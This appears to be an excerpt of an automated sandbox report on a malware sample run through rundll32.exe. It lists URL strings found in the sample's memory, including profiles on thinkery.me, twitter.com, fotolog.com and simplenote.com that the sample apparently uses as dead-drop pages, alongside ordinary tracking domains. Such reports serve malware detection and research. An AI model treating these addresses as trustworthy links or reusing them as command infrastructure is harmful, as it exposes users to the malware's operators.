Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2c)x
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cCache
Source: rundll32.exe, 00000002.00000003.383352250.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cQAG1ZO2m
Source: rundll32.exe, 00000002.00000003.383352250.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2chy
Source: rundll32.exe, 00000002.00000003.549629309.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cl
Source: rundll32.exe, 00000002.00000003.549629309.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cll
Source: rundll32.exe, 00000002.00000003.383352250.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cllA
Source: rundll32.exe, 00000002.00000003.440817199.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cllU
Source: rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmobile.twitter.com8
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmwu?
Source: rundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmwuK
Source: rundll32.exe, 00000002.00000003.383352250.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmwuP
Source: rundll32.exe, 00000002.00000003.440817199.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmwucn
Source: rundll32.exe, 00000002.00000003.549629309.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmwuy
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwX
Source: rundll32.exe, 00000002.00000003.403411650.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwmwu
Source: rundll32.exe, 00000002.00000002.578685625.000001DEA854C000.00000004.00000020.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwmwu5
Source: rundll32.exe, 00000002.00000003.394525573.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwmwuK
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwuP
Source: rundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://thinkery.me/billywilliams/5a0170161cb602262f000d2cyy
Source: rundll32.exe, 00000002.00000003.358275216.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twhttps://twitter.com/np8j7ovqdl
Source: rundll32.exe, 00000002.00000003.469331657.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqd
Source: rundll32.exe, 00000002.00000003.416320600.000001DEA8568000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.338427956.000001DEA8567000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.329382200.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl)
Source: rundll32.exe, 00000002.00000003.423600045.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl0
Source: rundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl1ZO2m
Source: rundll32.exe, 00000002.00000003.413703481.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl2keuco
Source: rundll32.exe, 00000002.00000003.367378843.000001DEA8563000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl5
Source: rundll32.exe, 00000002.00000003.396956681.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl8j7ovqdlX
Source: rundll32.exe, 00000002.00000003.423600045.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl9
Source: rundll32.exe, 00000002.00000003.350076633.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdl?
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlA
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlAc
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlH
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlL
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlName
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlP
Source: rundll32.exe, 00000002.00000003.329382200.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlU
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlZ
Source: rundll32.exe, 00000002.00000003.413703481.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlZO2m
Source: rundll32.exe, 00000002.00000003.423600045.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlbled
Source: rundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlbledn
Source: rundll32.exe, 00000002.00000003.413703481.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlco
Source: rundll32.exe, 00000002.00000003.329382200.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdld
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdleaH0T4yl_
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdler
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlh9ucjh
Source: rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdll
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdllish/pBn8Jt1cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdllish/pBn8Jtcb602262f000d2c
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlll
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlllZ
Source: rundll32.exe, 00000002.00000003.387444095.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlllc
Source: rundll32.exe, 00000002.00000003.460690694.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlm
Source: rundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlm/main.php?var=Qg2&term=2MbNQAG1ZO2m
Source: rundll32.exe, 00000002.00000003.358275216.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlmwu
Source: rundll32.exe, 00000002.00000003.329382200.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdln
Source: rundll32.exe, 00000002.00000003.423445511.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlr
Source: rundll32.exe, 00000002.00000003.508597198.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlreE
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlu
Source: rundll32.exe, 00000002.00000003.508575416.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdluok
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlwu
Source: rundll32.exe, 00000002.00000003.434090332.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlwuvqdl8J
Source: rundll32.exe, 00000002.00000003.387444095.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdlwuy
Source: rundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/np8j7ovqdly
Source: rundll32.exe, 00000002.00000003.324911783.000001DEA855E000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/
Source: rundll32.exe, 00000002.00000003.327520104.000001DEA855E000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/-
Source: rundll32.exe, 00000002.00000003.469400749.000001DEA8568000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.549629309.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.449995229.000001DEAA276000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmp, rundll32.exe, 00000002.00000003.416388236.000001DEAA276000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwu
Source: rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwu5
Source: rundll32.exe, 00000002.00000003.549629309.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwu?
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuA
Source: rundll32.exe, 00000002.00000003.416278812.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuL
Source: rundll32.exe, 00000002.00000003.549645041.000001DEA855D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuM
Source: rundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuPBc97A
Source: rundll32.exe, 00000002.00000003.336647896.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuQ
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuZ
Source: rundll32.exe, 00000002.00000003.416278812.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuc
Source: rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwucc
Source: rundll32.exe, 00000002.00000003.324911783.000001DEA855E000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuefaults
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwug.com/vz1g3wmwuM
Source: rundll32.exe, 00000002.00000003.411947706.000001DEA8568000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.373984343.000001DEA8563000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwum
Source: rundll32.exe, 00000002.00000003.416278812.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwun
Source: rundll32.exe, 00000002.00000003.358275216.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuog.com/vz1g3wmwuy
Source: rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwur
Source: rundll32.exe, 00000002.00000003.469400749.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuvqdl
Source: rundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuvqdl70161cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpString found in binary or memory: http://www.fotolog.com/vz1g3wmwuy
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://ads-api.twitter.com
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384639197.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://analytics.twitter.com
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://api-stream.twitter.com
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com
Source: rundll32.exe, 00000002.00000003.543342570.000001DEAA267000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450046492.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://api2.branch.io
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: https://app.a
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: https://app.app.simplenote.comapp.simplenote.com/vmapstage.snappytv.com
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://app.link
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.440843459.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/(
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/0
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/3
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/;
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmp, pBn8Jt[1].htm1.2.drString found in binary or memory: https://app.simplenote.com/publish/pBn8Jt
Source: rundll32.exe, 00000002.00000003.346376056.000001DEA8573000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jt1cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtA
Source: rundll32.exe, 00000002.00000003.467250798.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtF
Source: rundll32.exe, 00000002.00000003.458683068.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtH
Source: rundll32.exe, 00000002.00000003.440843459.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtIY7h9
Source: rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtT
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtamaihd.net
Source: rundll32.exe, 00000002.00000003.449995229.000001DEAA276000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.458683068.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtcb602262f000d2c
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtcharset=utf-8
Source: rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jth/pBn8Jter
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtic
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtings
Source: rundll32.exe, 00000002.00000003.440843459.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtlO
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jto-cache
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtom/N
Source: rundll32.exe, 00000002.00000003.434090332.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtpe:
Source: rundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtver
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtver8
Source: rundll32.exe, 00000002.00000003.440843459.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8JtverN
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtx
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://bnc.lt
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: https://caps.twitter.com
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384639197.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://cards-frame.twitter.com
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://cm.g.doubleclick.net
Source: rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: https://dhdsnappytv-vh.akama
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://dhdsnappytv-vh.akamaihd.net
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384639197.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net
Source: rundll32.exe, 00000002.00000002.581005966.000001DEAA298000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.578685625.000001DEA854C000.00000004.00000020.sdmp, rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508632369.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.416271346.000001DEA8545000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net;
Source: rundll32.exe, 00000002.00000003.550021029.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://fontapis.com
Source: rundll32.exe, 00000002.00000003.550021029.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?fam
Source: rundll32.exe, 00000002.00000003.543342570.000001DEAA267000.00000004.00000001.sdmp, pBn8Jt[1].htm1.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Noto
Source: rundll32.exe, 00000002.00000003.420500372.000001DEA8545000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: rundll32.exe, 00000002.00000003.420500372.000001DEA8545000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508632369.000001DEA8561000.00000004.00000001.sdmpString found in binary or memory: https://itunes.apple.com/app/thinkery/id660725713
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://mdhdsnappytv-vh.akamaihd.net
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://media.riffsy.com
Source: rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: https://mmdhdsnappytv-vh.akamaihd.n
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://mmdhdsnappytv-vh.akamaihd.net
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384639197.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com
Source: rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/
Source: rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/4
Source: rundll32.exe, 00000002.00000003.543393264.000001DEAA28D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.336654500.000001DEA8568000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.547437460.000001DEA8568000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl
Source: rundll32.exe, 00000002.00000003.440742585.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl70161cb602262f000d2c
Source: rundll32.exe, 00000002.00000003.477216661.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl70161cb602262f000d2crict-Transport-Security:
Source: rundll32.exe, 00000002.00000003.426898633.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8J
Source: rundll32.exe, 00000002.00000003.469331657.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8Jt
Source: rundll32.exe, 00000002.00000003.426898633.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8Jt1cb602262f000d2c
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8Jt1cb602262f000d2cy-policy:
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8Jto-cache
Source: rundll32.exe, 00000002.00000003.508575416.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl?
Source: rundll32.exe, 00000002.00000003.321023712.000001DEA8550000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdlD
Source: rundll32.exe, 00000002.00000003.383402482.000001DEA8556000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdlml;
Source: rundll32.exe, 00000002.00000003.449995229.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdlwaH
Source: rundll32.exe, 00000002.00000003.550021029.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: https://mpdhdsnappytv-vh.akamaihd.n
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: https://mpdhdsnappytv-vh.akamaihd.net
